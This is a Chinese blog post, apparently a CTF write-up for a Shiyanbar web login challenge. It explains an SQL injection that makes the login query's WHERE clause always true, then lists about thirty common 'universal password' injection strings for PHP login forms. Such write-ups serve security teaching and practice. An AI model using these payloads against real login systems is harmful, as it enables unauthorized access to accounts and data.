实验吧-WEB-sql万能密码注入

博客围绕CTF题目登陆解题展开,指出登陆成功可能获flag,关键字被过滤。介绍将where条件转换为永真式的解题思路,构造特定的username和password实现登陆。还列举了php常见的万能密码,如admin’/* 密码*/’等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

登陆一下好吗??

题目链接http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
解题思路
登陆一下好吗?表明可能登陆成功后就能得到flag,但是题目已经说过滤了的一切,所以一些关键字 例如 or ,应该被过滤了。
通常的后台代码应该是:
select username,password from user where username=’$user’ and password =’ $pwd’
需要将where的条件转换为永真式,就能查询到所有的用户和密码,
因此构造
username ‘=’
password ‘=’
即where username=’’=’’ and password=’’=’’
等号左右都是空 ,构成了永真式,因此语句能够运行,登陆以后就会看到flag
ps:payload的username和password都是 任意字母’=‘任意字母 例如 t’=‘p 此时where 语句从左向右依次读取,username=‘t’ 返回 false=‘p’ ‘p’进行类型转换是 0 即 false=0 结果是true,同理可得true and true 成为永真式。
在这里插入图片描述
php常见的万能密码:
admin’/*
密码*/’
‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值